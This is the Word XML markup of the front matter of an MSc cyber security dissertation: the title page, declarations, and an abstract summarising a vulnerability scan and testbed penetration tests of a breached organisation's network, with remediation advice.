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7B462" w14:textId="18BF4E50" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52404329" wp14:editId="065D4C99">
            <wp:extent cx="5663565" cy="920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63565" cy="920750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FE0ED" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00BD5A65" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E4CF52" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:t>An Investigation of a Post-Breach, Upgraded Security Stance using Vulnerability Scanning and Penetration Testing Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF253DB" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73012054" w14:textId="63CC2B26" w:rsidR="00DF42B8" w:rsidRDefault="002F0994" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266BE405" w14:textId="77777777" w:rsidR="002F0994" w:rsidRPr="002F0994" w:rsidRDefault="002F0994" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D421D3F" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="SubtitleChar"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:rStyle w:val="SubtitleChar"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Helen Frey | 1252724</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C68AE90" w14:textId="695A3AE1" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4591CB5D" w14:textId="77777777" w:rsidR="002F0994" w:rsidRPr="002F0994" w:rsidRDefault="002F0994" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16FD9864" w14:textId="052B1E59" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Lecturer: Associate Professor Carlene Campbell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CBF226" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB7B888" w14:textId="5CD106F5" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Project submitted as part of the requirements for the award of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222EEE9C" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MSc Computer Networks and Cyber Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8488CC" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="002F0994" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0994">
        <w:rPr>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>September 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080E7CD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="008B62F3" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="0060608D">
        <w:lastRenderedPageBreak/>
        <w:t>DECLARATION OF ORIGINALITY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C49A0AD" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00B65D76" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve">I, </w:t>
      </w:r>
      <w:r>
        <w:t>Helen Louise Frey,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve"> declare that I am the sole author of this Project; that all references cited have been consulted; that I have conducted all work of which this is a record, and that the finished work lies within the prescribed word limits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5FAB1" w14:textId="0576CE73" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="002A4D53">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve">This work has not previously been accepted as part of any other degree submission. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03B2D8" w14:textId="39DABEA9" w:rsidR="002A4D53" w:rsidRDefault="002A4D53" w:rsidP="002A4D53">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251909120" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39CCA5F2" wp14:editId="431C53D9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>692150</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>139700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="491490" cy="636905"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20674"/>
                <wp:lineTo x="20930" y="20674"/>
                <wp:lineTo x="20930" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="760259183" name="Picture 76025918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83" name="Picture 760259183" descr="Text, letter&#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91490" cy="636905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B270DDE" w14:textId="302A044E" w:rsidR="00DF42B8" w:rsidRPr="00BE7050" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1724">
        <w:t>Signed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7050">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044BE32E" w14:textId="4542E9E9" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A23E58">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0072441D">
        <w:t xml:space="preserve">5 September </w:t>
      </w:r>
      <w:r w:rsidR="001B51F8" w:rsidRPr="001B51F8">
        <w:t>2022</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331472B3" w14:textId="77777777" w:rsidR="002A4D53" w:rsidRDefault="002A4D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DA38DF7" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="0060608D" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0060608D">
        <w:t>FORM OF CONSENT</w:t>
      </w:r>
      <w:r w:rsidRPr="0060608D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689F8C0" w14:textId="1D843A15" w:rsidR="00DF42B8" w:rsidRPr="00B65D76" w:rsidRDefault="002A4D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251910144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4712F195" wp14:editId="0599C5D6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>706582</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1342448</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="499745" cy="652145"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20822"/>
                <wp:lineTo x="20584" y="20822"/>
                <wp:lineTo x="20584" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapThrough>
            <wp:docPr id="760259184" name="Picture 760259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9745" cy="652145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00B65D76">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00B65D76">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:t>Helen Louise Frey,</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00B65D76">
        <w:t xml:space="preserve"> hereby consent that my Project, submitted in candidature for the </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="008F3B15">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t>MSc Computer Networks and Cyber Security,</w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8">
        <w:rPr>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="00B65D76">
        <w:t xml:space="preserve">if successful, may be made available for inter-library loan or photocopying (subject to the law of copyright), and that the title and abstract may be made available to outside organisations. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1618A42F" w14:textId="5DA25B14" w:rsidR="00DF42B8" w:rsidRPr="00BE7050" w:rsidRDefault="00DF42B8" w:rsidP="002A4D53">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc371255526"/>
      <w:r w:rsidRPr="006E1724">
        <w:t>Signed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7050">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F6F06" w14:textId="1058097E" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="002A4D53">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="600" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r w:rsidR="0072441D">
        <w:t>5 September</w:t>
      </w:r>
      <w:r w:rsidR="001B51F8" w:rsidRPr="001B51F8">
        <w:t xml:space="preserve"> 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657143CD" w14:textId="77777777" w:rsidR="002A4D53" w:rsidRDefault="002A4D53" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2356A509" w14:textId="56F3E3A6" w:rsidR="00DF42B8" w:rsidRPr="00AE1E1C" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00AE1E1C">
        <w:t>Copyright Acknowledgement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4E060D68" w14:textId="78A18305" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00B65D76">
        <w:t>I acknowledge that the copyright of this project report, and any product developed as part of the project, belong to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00B65D76">
        <w:t xml:space="preserve"> University of Wales Trinity Saint David, Swansea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672C434F" w14:textId="77777777" w:rsidR="0072441D" w:rsidRDefault="0072441D" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E52A1FD" w14:textId="58C9E048" w:rsidR="0072441D" w:rsidRDefault="0072441D" w:rsidP="0072441D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This project meets the requirements of the EC Council’s Certified Ethical Hacker Program and Penetration Testing Execution Standard. All confidential information has remained confidential and no reference to Organisation A has been made public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A4169" w14:textId="661502AB" w:rsidR="0072441D" w:rsidRDefault="0072441D" w:rsidP="0072441D">
      <w:r>
        <w:t>Provided these accountabilities are met, I, Helen Louise Frey, cannot be held liable for legal actions or damages resulting from the tests, including but not limited to the Computer Misuse Act 1990.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097B0BB" w14:textId="5D18AACA" w:rsidR="00D03F10" w:rsidRPr="00B65D76" w:rsidRDefault="00D03F10" w:rsidP="00D03F10">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593D1F07" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DC3DFD" w14:textId="78CFB4C6" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00540725">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc113190687"/>
      <w:r w:rsidRPr="0060608D">
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47406CA7" w14:textId="52F667C8" w:rsidR="0078439B" w:rsidRDefault="0078439B" w:rsidP="009E67A5">
      <w:r>
        <w:t xml:space="preserve">Following a breach, </w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t>Organisation A’s network security stance was upgraded.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This report covers an investigation of the post-breach upgraded security stance using vulnerability scanning and penetration testing techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C3A886" w14:textId="406E0930" w:rsidR="009E67A5" w:rsidRDefault="00CA17A7" w:rsidP="009E67A5">
      <w:r>
        <w:t>OpenVAS was used to conduct a vulnerability scan and the</w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t xml:space="preserve"> results demonstrated that there were many </w:t>
      </w:r>
      <w:r w:rsidR="00B15B95">
        <w:t>common vulnerabilities and exposures</w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B15B95">
        <w:t xml:space="preserve">present ranging </w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t>from severity level 10 to 2.6. These were researched and the vulnerabilities were matched to attack vectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B867E9" w14:textId="24C64915" w:rsidR="00CA17A7" w:rsidRDefault="009E67A5" w:rsidP="009E67A5">
      <w:r>
        <w:t>For Organisation A to mitigate these vulnerabilities as soon as possible</w:t>
      </w:r>
      <w:r w:rsidR="00CA17A7">
        <w:t xml:space="preserve"> rather than await the outcome of the investigation</w:t>
      </w:r>
      <w:r w:rsidRPr="003900AC">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD5B1E">
        <w:t>testbed</w:t>
      </w:r>
      <w:r w:rsidR="003900AC" w:rsidRPr="00FD5B1E">
        <w:t xml:space="preserve"> was created</w:t>
      </w:r>
      <w:r w:rsidR="00B15B95" w:rsidRPr="00FD5B1E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBAA5A9" w14:textId="7E3C7305" w:rsidR="009E67A5" w:rsidRDefault="00B15B95" w:rsidP="009E67A5">
      <w:r>
        <w:t>Four exploits were carried out on the testbed: Follina, EternalBlue, Ghostcat and Jerry with MSFVenom.</w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t xml:space="preserve"> All four of the exp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">loits </w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t>were successful</w:t>
      </w:r>
      <w:r w:rsidR="00CA17A7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t xml:space="preserve"> however</w:t>
      </w:r>
      <w:r w:rsidR="00CA17A7">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t xml:space="preserve"> there was no defensive software </w:t>
      </w:r>
      <w:r w:rsidR="003900AC">
        <w:t xml:space="preserve">such as Microsoft Defender </w:t>
      </w:r>
      <w:r w:rsidR="009E67A5">
        <w:t>on the testbed whereas this would have been present within Organisation A’s network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70158A03" w14:textId="64B9B3B2" w:rsidR="003900AC" w:rsidRDefault="003900AC" w:rsidP="009E67A5">
      <w:r>
        <w:t>Following the vulnerability scan Organisation A has improved their defensive stance accordingly, has been advised to carry out further vulnerability scans and patch the vulnerabilities on a regular basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58081C00" w14:textId="51F84716" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:id w:val="-235861043"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="4A271D4B" w14:textId="77777777" w:rsidR="00DF42B8" w:rsidRPr="00142014" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="851"/>
            </w:tabs>
            <w:spacing w:line="360" w:lineRule="auto"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00142014">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            </w:rPr>
            <w:t>TABLE OF CONTENTS</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="499AF92C" w14:textId="067E9854" w:rsidR="00F93DB2" w:rsidRDefault="00DF42B8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>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113190687" w:history="1">
